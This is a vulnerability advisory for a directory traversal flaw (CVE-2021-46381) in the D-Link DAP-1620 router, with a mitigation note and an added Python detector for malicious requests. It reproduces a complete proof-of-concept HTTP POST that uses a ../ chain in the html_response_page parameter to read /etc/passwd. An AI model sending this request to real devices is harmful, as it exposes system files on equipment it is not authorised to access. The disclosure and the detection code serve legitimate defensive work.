vendor: DAP-1620 A1
by: Momen Eldawakhly (Cyber Guy)
CVSS: 7.5 (HIGH)
CWE: 22 (Directory Traversal)
Product Name: DAP-1620 A1
Affected Version From: DAP-1620 - A1 v1.01
Affected Version To: DAP-1620 - A1 v1.01
Patch Exists: YES
Related CVE: CVE-2021-46381
CPE: h:dlink:dap-1620_a1:v1.01
Tags: lfi,router,packetstorm,cve,cve2021,dlink
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Nuclei Metadata: {'max-request': 1, 'vendor': 'dlink', 'product': 'dap-1620_firmware'}
Platforms Tested: Linux
2022

DLINK DAP-1620 A1 v1.01 – Directory Traversal

This exploit allows an attacker to traverse the directory structure of the DLINK DAP-1620 A1 v1.01 router by sending a specially crafted HTTP POST request to /apply.cgi. The html_response_page parameter of that request accepts a relative path containing ../ sequences, which can be used to access sensitive files such as /etc/passwd.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their routers to the latest version.

Exploit-DB raw data:

# Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal
# Date: 27/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://me.dlink.com/consumer
# Version: DAP-1620 - A1 v1.01
# Tested on: Linux
# CVE : CVE-2021-46381

POST /apply.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://84.217.16.220/
Cookie: ID=634855649
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: 84.217.16.220
Connection: Keep-alive

action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass
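
Detection example (added here; not part of the Exploit-DB entry or any D-Link code): a check that a proxy or log pipeline could run over captured requests to flag a POST to /apply.cgi whose html_response_page value leaves the web root. It assumes legitimate values are bare page names relative to the web root; the function names, the `login.asp` value and the sample requests (documentation address 192.0.2.1) are constructed for illustration.

```python
from urllib.parse import parse_qs, unquote, urlsplit

TARGET_PATH = "/apply.cgi"            # endpoint named in the request above
TARGET_PARAM = "html_response_page"   # parameter that carries the traversal

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so multiply-encoded values are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if the page name would leave the web root once decoded."""
    path = fully_decode(value).replace("\\", "/")
    if path.startswith("/") or "\x00" in path:
        return True                      # assumption: real values are relative
    return ".." in path.split("/")       # a '..' path segment, not just two dots

def inspect_request(raw):
    """Return the offending parameter value, or None if the request is clean."""
    head, _, body = raw.partition("\r\n\r\n")
    parts = head.split("\r\n", 1)[0].split(" ")
    if len(parts) != 3:
        return None                      # not a well-formed request line
    method, target, _version = parts
    if method != "POST" or urlsplit(target).path != TARGET_PATH:
        return None
    # parse_qs performs the first round of percent-decoding on each value.
    for value in parse_qs(body, keep_blank_values=True).get(TARGET_PARAM, []):
        if is_traversal(value):
            return value
    return None

def sample_request(page):
    """Constructed sample with the same shape as the request above."""
    body = f"action=do_graph_auth&{TARGET_PARAM}={page}&login_name=DummyName"
    return (f"POST {TARGET_PATH} HTTP/1.1\r\nHost: 192.0.2.1\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")

if __name__ == "__main__":
    for page in ("login.asp", "../../../../etc/passwd"):
        print(page, "->", inspect_request(sample_request(page)))
```
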